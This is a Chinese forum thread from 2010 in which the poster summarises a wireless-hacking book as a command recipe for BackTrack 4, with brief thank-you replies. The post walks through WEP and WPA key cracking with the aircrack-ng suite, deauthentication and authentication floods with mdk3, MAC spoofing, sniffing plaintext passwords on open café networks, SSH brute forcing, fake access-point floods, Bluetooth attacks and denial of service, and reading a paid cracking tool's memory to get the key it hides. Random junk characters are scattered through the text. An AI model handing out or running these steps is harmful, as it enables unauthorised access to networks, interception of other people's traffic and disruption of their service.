查看: 11041|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3718

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。2 W  y( ~2 d0 l, @
) L: B+ Z6 K# g! P3 Y
以下所有操作均在BackTrack 4中进行。
: ~. }$ z$ K# e: v) Z" V
5 z% b! ~5 G) I: `0 q4 }% f1 B' l+ }! {6 D  n+ m' r
无线WEP加密P解:4 K" w3 _/ r. B9 G8 c
, r! u. ?1 v+ S5 a$ ]6 [
注入P解:
, K& r  u# v* J" [2 [, X% l+ C9 g+ C3 b7 B1 A
ifconfig+ |# }* J+ B. m2 E  Z9 F
0 @3 z/ k8 }1 u& L
ifconfig –a2 f/ J+ }3 j' c$ W/ F
1 Z/ ?4 h: Z: f/ b4 ^8 p- {
ifconfig wlan0(无线网卡) up; f4 J( p$ a$ d: u7 b

# h0 n4 \+ ]" y+ K2 g2 y0 Vairmon-ng start wlan0
7 M8 x  e, j9 i: B- V, D" F. B0 H
* R; d0 ?4 g2 X4 H; x4 ~airodump-ng mon0
1 r! m7 U& ~/ v7 i5 L+ Q3 f: C" H9 Q$ C" i) y
airodump-ng --ivs –w ivsfile –c 频道 mon0或/ ?7 `+ P# J/ _2 V  T
# q0 Q+ S/ w! p- T
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
: I. r6 x# H3 C# L0 M# S  t: w- v  e5 S: W: X" r4 A9 R; |+ T
aireplay-ng -3 –b BSSID –h Station mon0
8 @- }/ S4 \3 w! s2 \/ K/ v+ e, D. B& D
aircrack-ng ivsfile-01.ivs( d2 o+ n9 ~  |: u7 S5 h, @8 }% E

1 j( S9 z  A1 y5 N1 b, i6 q4 V/ K* @虚连接P解(适用于无客户端连接APP解)
# h) H  {4 `  j9 M$ y6 B% W" h7 t4 F! V( {8 c7 P5 v% N1 |" r* K
ifconfig$ E" Q* f8 G9 t8 y$ m
( g) C4 j  G4 ~! _! L$ Z  o$ ^
ifconfig –a
- ^. y! w" P) }$ k& p8 Z8 E; A8 n6 R( V* \
ifconfig wlan0(无线网卡) up
5 v( F% F9 q$ f+ e
: L# {7 _% u" b5 @) n3 Hairmon-ng start wlan02 U; K1 o8 Q% G; [* ^8 |
$ a$ l$ v" o/ W( C
airodump-ng mon0/ X/ f4 _8 C" g! j8 L

" O% w1 Y8 @0 wairodump-ng --ivs –w ivsfile –c 频道 mon0或
3 g( y  h2 ?2 z% R7 v! d
( A2 Y  j! u8 e8 t. x$ Yairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon07 Q: @" N7 i+ ]- u' B

8 C, j3 g. Z5 N# l4 u1 \aireplay-ng -1 0 –e SSID –a BSSID –c Station mon01 p& N% K; Y" i; S0 X% N
- n! ?3 R: D- P. p
aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0
5 j! F6 Q2 a+ O' Y1 f. E9 r8 ~% A8 u" `% k  u
aircrack-ng ivsfile-01.ivs
% \0 Y( e1 P3 Z1 l" u
' ^, M% z. \( }* B0 S4 p5 R* T/ k( I9 f" i
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。
) ]8 a! I! z- M
0 x( g+ Y! ?2 `0 `
4 k7 I( `/ p3 f9 a# X5 l' l3 u) CWPA-PSKP解
! q4 ^! d. i' ~5 P, }/ B: R/ {
+ ?% S0 c  m7 i4 T1 fifconfig: H1 ^- P/ r- P3 M* P% ^
0 T  v/ @8 L; B- ^& E
ifconfig –a! z6 L- J. J; D; ?  P' [# T* V- Z

! n+ o- g/ [  r, tifconfig wlan0(无线网卡) up3 |# O( {5 Q# u& Y  h: r2 j  t
! s1 A9 a; {( d6 q
airmon-ng start wlan0% ?+ w; h' A' A* p3 w: R' U

# D1 W6 Z2 `8 cairodump-ng mon0
8 S* S! i) c& Q  ~+ d! k* U" k4 Z. b
airodump-ng –w capfile –c 频道 mon0+ a! x9 n4 a, ^6 p% @
7 J3 F0 q2 P" Z
aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包( B, m5 Y) S1 H1 v% K

* j- L+ N5 ]+ }2 n* ^aircrack-ng –w Dic capfile-01.cap或
; h& X0 }1 c7 {. Y; x, \0 m4 r& d7 q- B2 r0 I
cowpatty –f Dic –r capfile-01.cap –s SSID
; @6 w( E% v5 [% n! l' ^  O6 {! M' z
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID# S: q- m9 j7 v5 r( X
( _- {% {+ n$ Q, v# Q
傻瓜式P解软件SpoonWPA。( X" c! ^0 V- d/ g) j5 G
; \" ?& w/ z6 |# @, c
BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst
, t3 C- a" i6 O+ h& Z, L; t. e' r  |! G' D9 n
+ N: r, h% U: J2 c: ~( @' a
字典文件的生成和上传: r8 ^5 l( h  F3 u% P% X- L5 l9 p
. T' ^' |4 e" V
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。# t8 g/ O9 H: L+ Z8 e

8 f- p, T, V0 j+ _& P# y) ]4 y0 W' q8 M
BT4下开启Tftp:Services—TFTPD—start TFTPD
. A3 {1 l% J6 l" t  S6 B0 U7 F: Q) m; _2 i7 z; {# h
在Windows的CMD中运行 tftp –i IP put **.dic( s' n% v% K7 }* N% `# c
2 `7 ?  h+ U& l3 J, p+ h( R

+ i) ?. W& I0 ?" Z, jBT4下开启SSH:Services—SSH—start SSH- O5 e* m" v0 o! `1 Y* E  v1 [
! f% |7 D, J1 P" D) x+ q
Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root! J/ U, Q7 \( H2 \6 b8 x. g$ b8 p
! e0 @2 H, n0 k- a) `) A$ p

: z8 {" T% W! p' m$ `AP限制MAC时的解决- `+ [& W" T/ U6 i
) |- T- r, A7 u9 |6 h7 x; n
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:8 Z* G1 d( Z2 L2 O) @  a6 j: u
9 T" A* M4 _+ l7 E% B  Q
ifconfig wlan0 hw ether NewMAC; G9 e# v9 p' ~
6 K2 f9 _! y  G# p1 J+ }5 E/ e% R

1 S& I+ q* Q' M8 m% f) j关闭SSID广播的AP探测:7 P! L9 U8 W- a9 d$ y

" p' I* E0 G3 w: e  ?% K1 ^+ V1.     Deauth攻击:/ {; x) _- `+ p$ I" x/ P

; W  I2 G! G( r. T" q3 }! d# Zairodump-ng mon0: z# ^8 p7 N+ Q! J: m7 ^

( f$ u. @1 }, k: T! k. p6 w0 Raireplay-ng -0 10 –a BSSID –h Station mon0/ ?( ?1 v  s8 f
$ ^8 O; Q$ F! j* o  F
2.     抓包分析
1 a- g9 Q" E$ V2 u& t0 _, I4 d9 @# m+ x( ^* ~) w
Omnipeek
$ Z" q: J6 S! u0 B% y2 t4 G) T+ k
- z+ z7 O  X) C  _Tcpdump –n –e –vvv –i 网卡名
5 M! u" M$ S" d0 N
0 k8 n3 U* ~' V* l3.     暴力P解
; n# M1 B" T+ ^! N) B. d, U' n
* l( v& Y" K" {, P; z" u3 c2 ACharon 1.1暴力P解$ l) T- L  G) g* b5 b1 k8 N

) Z; x! B  z" v, ^+ z0 C- E& G
, [* v9 G3 J3 P, C7 Z7 ]无线加密数据包的解密
2 \) V& u- \# P; n, H; |" _+ `; ]) G% E- A( E1 A" y- e
0 e" N5 C8 s0 O' f6 M* D& ~6 m
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
1 N6 c9 H. q7 {; M/ H1 o4 ]' y; ]8 i9 [- [) g* g
FilterNS     DNS解析数据包" H7 V( q" v+ Z$ d# S0 k
! K, Y# S& \% w3 s" f: @& s2 y
Filter:HTTP    WEB访问数据包
$ S4 Z- O  h: s" j8 i, I- T* I# {3 v! ?1 Q4 D
Filter:msnms   MSN6 K; W2 I9 g6 b8 [
$ Z. D9 S6 ~2 H% w0 h. p" J1 A# |
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。+ w5 v* \- b" M* n1 C* i( J# x
) z2 b5 ^3 u3 y& q" C# x+ I
使用airdecap-ng解密:3 \# Y6 z- K) x: p+ y% P" \4 @4 j
7 G# {8 d' l- A0 f8 v& @- G& Y  O# {
Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap
* Z1 L+ O+ X2 Z3 P1 E5 M+ E$ u/ x% ^) s, b/ ]9 `

2 C/ F! q. e$ R5 O7 U1 {咖啡馆中无线数据截取(开放式无加密AP)
& `+ \% [/ b" X; C* p: c3 ]6 P. r# E; \5 _
1.Airodump-ng –w data –c频道 mon0
* x, h& \7 E% o$ `
4 t/ \/ \2 ], I8 E& W% {; W, y! }- k2.使用WireShark打开分析
0 Z7 F- ]& Z2 {; e0 _8 U* e) r6 Z1 P' ^) A0 \. g+ ^* g
5 z4 ^' E$ Y9 {* r8 R" t9 E! T, ~
BT4下的渗透工具:
5 f) L8 |% @7 s% Z( u0 t8 X/ b7 _4 Z$ e- O/ G
nmap –sP IP/24        判断C段下存活的主机
5 k" @% a; h9 W- i% c* _# m
2 B% y$ V* C6 b3 Q! Fnmap –vv –sS IP/24 –p Port    扫描指定端口是否开放
+ a3 D: h" t2 S- \# m
1 N3 P- D% L5 P6 `3 ~  Dnmap –vv –sV IP –p port   指定端口的详细信息。。。' g' W% E9 K2 [) W% I  y

* u/ X  E+ k  V9 ]% G: ]namp –O IP/24    判断主机的系统版本/ P9 C9 S- u3 T/ W2 ?
1 y; _( {. B; \8 q) d0 t) _; n1 ?

, j4 m1 m1 s$ }7 j. yGUI 版nmap:Zenmap % w+ [! _4 z( U8 s, D* x) A+ h

9 M2 B, i* i2 j/ W! v3 h+ m! v- K" n" S& B
Amap使用:amap –B IP port- L, P+ }1 P9 W3 d
; S! W. ^6 K2 O  e: S6 M
Nbtscan(扫描Windows网络NetBios信息):
1 Z' [" Q" U& |/ |& A" `- Q2 g( N# [/ f
nbtscan –v –s : IP/24
( ]( A3 s2 s$ \4 l
& P  q/ M  d7 N% q) bnbtscan –r IP" w, ?( g9 [6 @6 \/ r; d9 \( k7 D

* S2 G' M4 l" {( m3 [. _0 f% D, N
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
5 i1 b. q" c$ V  ]
8 w7 X5 I) O5 y& l6 z: d0 k( M) ?6 T5 h' Y+ P
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
9 s1 W$ j8 V. J5 r. C7 b
) @& d9 _8 G4 R1 l0 V) gBruteSSH: ./bruthe.py –h IP –u Username –d Dic
5 o& V6 N1 Z/ M7 \* B6 L5 ~: F9 j7 f- M. g5 B1 V" A
Metasploit3使用% y  a6 H' ^' S+ r6 \- x( I
无线D.0.S
' @  v3 T9 J1 y, a5 S7 H1 f4 J& m9 N3 D$ e
' K( A' g9 j4 N0 V
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)+ _8 ~2 ?5 A# p% G
+ v9 E" U, L8 }
airmon-ng start wlan08 F6 C+ }# Q  b
) b# y) D/ v) f5 v/ q4 F
airodump-ng mon0
8 m4 z4 o  C" W
& u* ^- F0 ?) w8 y6 `mdk3 mon0 a –a BSSID
$ o8 R4 R7 z1 P6 `. e# H( W+ C' S; ?/ v/ Y7 z( h, b1 {* t8 a
对所有的AP攻击:mdk3 mon0 a
8 H# D/ M4 p+ ~  R# t6 H/ F3 y0 V; L, s% j
! j- q6 m0 O' d8 D9 j) o
Deauth Flood 攻击
" n5 ^- {( z2 N# E9 Q: O! l  P) w! \& i7 ]
mdk3 mon0 d –c Channel' `/ v1 Z+ V+ n9 S# T- o
2 Y5 a3 E/ s. J
图形化D.O.S攻击:Charon2 L0 u0 ]0 J) x; P9 f+ j

) G2 u$ _5 e8 o0 w
* a6 n, q$ @5 |* W/ x当受到攻击时,使用Wireshark抓包可以看到异常信息。
" z+ `, [+ Y( U+ f' s: N% u5 y; L
2 Q6 F( e1 ^6 t( p6 i! Y: Y* T  M, a. y7 \0 z
WPA-PSK高速P解( U# f( H# c& c3 x) C4 P

7 g" \. w1 j) x1.       WPA-PSK PMK Hash TablesP解1 x8 h# x# H! d0 o8 l

* T' l; l6 H4 Y! {6 u2 CCowpatty –d HashTable.hash –r ***.cap –s SSID7 e% P6 B+ k( a9 t9 W

; I. N- o6 V4 v: KHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID/ u( _% b8 h  c( |1 o

: R+ e* |/ S" ]6 C' D" P  V2.       GPU辅助高速P解
; L/ r& o8 ]4 i" w2 R. ~' R* l5 a5 a9 L5 H
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
" e8 b; Q: V  N) I0 y; e, x
) w6 ?+ \& q/ H# a  M- Q3.       分布式P解
5 I0 }8 }% {0 @+ o) S0 X+ l9 k, O0 N' u1 j/ g( k

: U4 p5 p( j/ g7 ]" A* ?AP的伪造
+ E# M7 R" U" E  B# I0 r" Y1 S& C4 I4 z; p
把AP的MAC改成目标AP的MAC+ s$ j$ O, V& v" n9 ^+ ]" E
: ^  L) C! r3 E/ e
网卡软AP( Z; @% z; \! D) M- G

# ~) n( s! ?: s; _
( j  }3 W! m, s! Q, o& |& L伪造大量虚假AP信号:  G0 W* Z1 A" z; E

. q+ t3 v! T! i2 q" b+ ?; h随机SSID:mdk3 mon0 b –g –c 频道
8 X  _  w3 \+ B) ~, l3 ?$ K  _' L  d4 R
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度
; S  K4 k. b2 Q: D% |( ~! g9 @5 s' G+ Q$ g
3 b. {% k- v3 m- Q% Z# Y8 ~
War-Driving
) F) {$ E/ m7 {; `' l: d4 |! L  |- e7 r
热点地图绘制
, F# D/ ]8 m, u0 N8 _
: }, j% [# h4 B5 g3 E$ yWindows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
% [- u% l* U; @1 l/ F, P: Z2 N# T
. k- y; x) g" P  N  R* y  |: b/ e( `6 u8 b3 J5 N) {4 }8 [/ F( _! }
Netstumble6 `: Z3 g( j) M% p( a
+ c6 y. V9 X4 ?

1 [, f0 ?2 |* u$ N  t蓝牙Hacking. A* V" F+ h& m+ I. r3 b
& Y5 D! }* [4 v7 Z
Windows下的Blue Soleil工具
+ T% v- C& e# N; n: d. Y
- S) e5 V7 o1 I1 _BT4:. H5 r2 j5 L8 w1 u( g. T/ I

& F& Y" b) @) Q. Rhciconfig 查看蓝牙适配器
+ e: y- q" [: a
" Z7 O6 u( w: d8 [$ n: zhciconfig hci0 up 载入蓝牙适配器' c, y, e& G, t' r6 `

- L' ~! ?7 O2 m# m: bhciconfig hci0 class 蓝牙适配器详细信息1 k+ P9 G2 P; [6 b
, o9 {3 ?! ?# G$ ~2 O4 U
& p! H$ T4 r) L! e  B
hcitool(扫描蓝牙)
: e7 f$ \$ i; d- W4 }- @& i, t# M. j' S* ]0 L5 s. e
hcitool –i hci0 scan9 Z) R" ^- {5 w" y! a
  C; P$ ^. x3 @- c% Y
BTscanner(扫描蓝牙)0 }$ A: K+ O' L+ k

. w/ Q+ l, X5 ]8 r$ C1 L
$ ~1 d2 \- F, Y蓝牙攻击:
' h& j$ r- h7 u( U$ L
' Q8 g; I  B+ K% m' JBlueBugging (适用于BlueTooth V1.1的手机)! w' Z& _* X8 t4 s

4 N' `! W( E/ E8 L( c3 F0 \Bluebugger工具:* J, f: R( f0 [1 H; b# z2 o
% R! W, g; u# g. [4 |1 n6 |+ C! \, Q
Bulebugger –a HD_Addr info% r9 C+ Z$ _0 v3 Y8 ^$ Q4 j
" A/ c4 G  t  b+ v+ {9 U) @& O

% f+ g7 b2 j1 k: a0 O8 dBlueJacking
3 F! K0 j; f% U5 C( }" I; k
+ S1 n9 K# ]& T5 M实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
$ U, W1 [! Q- w0 p
. L) A! v9 i5 t) _1 P- ]' X3 y; h. S
HD_Addr修改:
4 _7 n7 G* |7 }, J
* Q& m1 K( l9 z# JBdaddr工具
: Q6 T* m% X/ n! l9 \9 I- J: J' Z# Y8 z9 z+ N: F+ R
bdaddr –i 蓝牙设备名 新HD_addr( Z4 e4 j4 W' e: f8 P& {
: }  ]* i" W* c/ [1 x8 g: r  M
' M+ ?9 r- T$ E) i1 e" c! b
蓝牙D.O.S$ ?" q: i# l" i

. k" u" [3 J9 T8 [l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
& G8 T- @5 H- i2 n( z. {; h# n
/ E4 s* n: [9 xhciconfig' V) Z! p: k% h9 J

8 _9 R! y( y: P9 L' v( {+ ?* xhciconfig hci0 up
5 E/ u0 w! F. _9 G5 L* s3 |
' L: F' @+ E7 {# h! dhcitool –i hci0 scan( }: i3 D0 U9 v( q$ t8 z
1 |& O) j. ^# S
l2ping –s 10000 –目标MAC
5 G% M+ e2 E2 ~7 C
. \8 O( o/ r8 s# P+ k' d
2 w" g# `3 w: ^, B4 n5 s不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
/ v' S0 N: y$ L4 x
- L, _& v+ J3 l8 E./fang –r ************-############ -s
) ]/ X, h+ u* B/ W( {2 }* [8 t+ f  {5 t8 @- L3 j: K5 @) u2 c. G
暴力P解************-############的蓝牙设备% k$ _  R: r; S$ i: Y

* ^- Y" h9 F8 o: c6 w, S) J./fang –l 各厂商BD_Addr分配
2 J3 Z; }0 R) m: N0 }* A1 N
" r- k3 q& |; Y& P6 U, k
! S) A2 z  A% D7 [3 ?# S: R; NWifiZoo使用# v# B( f3 R+ C* {) d

- I8 o4 u2 @. f7 Z& U+ E./wifizoo.py –c Capfile4 ~7 z0 P- T: H7 |0 E; I5 U
8 q" Q) P: Q8 p( P5 q- P; ~$ H
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

835

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

140

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2266

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

257

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

940

积分

中尉

签到天数: 13 天

[LV.3]偶尔看看II

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。
) \! Z  f3 v. u7 v+ z) e  W$ _0 O6 k借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的
3 {! N3 P6 z0 D' A呵呵 其实也不贵 21块 快递再一点! R0 X7 z% k' {0 }; L
我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

Archiver| 手机版| 中国无线门户 ( 粤ICP备11076993 )  |网站地图    小黑屋 | 免责声明

GMT+8, 2017-6-28 06:25

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表